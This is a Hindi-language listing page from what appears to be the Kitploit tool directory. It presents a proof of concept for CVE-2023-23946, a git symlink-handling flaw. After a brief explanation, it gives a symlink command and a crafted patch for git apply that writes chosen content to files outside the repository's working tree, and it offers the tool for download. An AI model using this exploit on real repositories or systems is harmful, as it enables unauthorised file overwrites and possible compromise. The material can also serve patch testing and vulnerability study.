Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-23946-POC — CVE-2023-23946 की व्याख्या और POC | Kitploit
उपकरण/GitHubGitHub/bruno-1337/cve-2023-23946-poc
भेद्यता विश्लेषणशोषणपेपर और शोधलर्निंग और शिक्षाबाइनरी शोषण
GitHubbruno-1337/cve-2023-23946-poc

CVE-2023-23946-POC

CVE-2023-23946 की व्याख्या और POC

रिपॉजिटरी देखें
163 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-23946 POC शोषण

CVE-2023-23946 का स्पष्टीकरण और POC

CVE-2023-23946 भेद्यता git द्वारा प्रतीकात्मक लिंक को संभालने के तरीके में एक दोष के कारण होती है। जब git एक प्रतीकात्मक लिंक बनाता है, तो वह वास्तव में इसे प्रतीकात्मक लिंक के रूप में नहीं संभालता है और इसी कारण हम इसका शोषण करके कार्यशील वृक्ष के बाहर की फ़ाइलों को इंगित कर सकते हैं।

सबसे पहले एक symlink बनाएं

ln -s [PATH_YOU_WANT_TO_ACCESS_OUTSITE_WORKING_TREE] symlink

अब git apply के साथ उपयोग करने के लिए एक पैच बनाएं

diff --git a/symlink b/newsymlink
rename from symlink
rename to newsymlink
--
diff --git /dev/null b/newsymlink/spawn
new file mode 100644
index 0000000..e47f4ea
--- /dev/null
+++ b/newsymlink/[FILE_OUTSIDE]
@@ -0,0 +1 @@
+[WHAT_YOU_WANT_INSIDE_THE_FILE]
\ No newline at end of file

पैच क्या करता है? हम मौजूदा प्रतीकात्मक लिंक का नाम बदलते हैं और एक नई फ़ाइल बनाते हैं। इस तरह, जब हम /newsymlink/[FILE_OUTSIDE] को संशोधित करते हैं, तो git प्रतीकात्मक लिंक के विरुद्ध अपनी सुरक्षा लागू नहीं करता है।

टूल डाउनलोड करें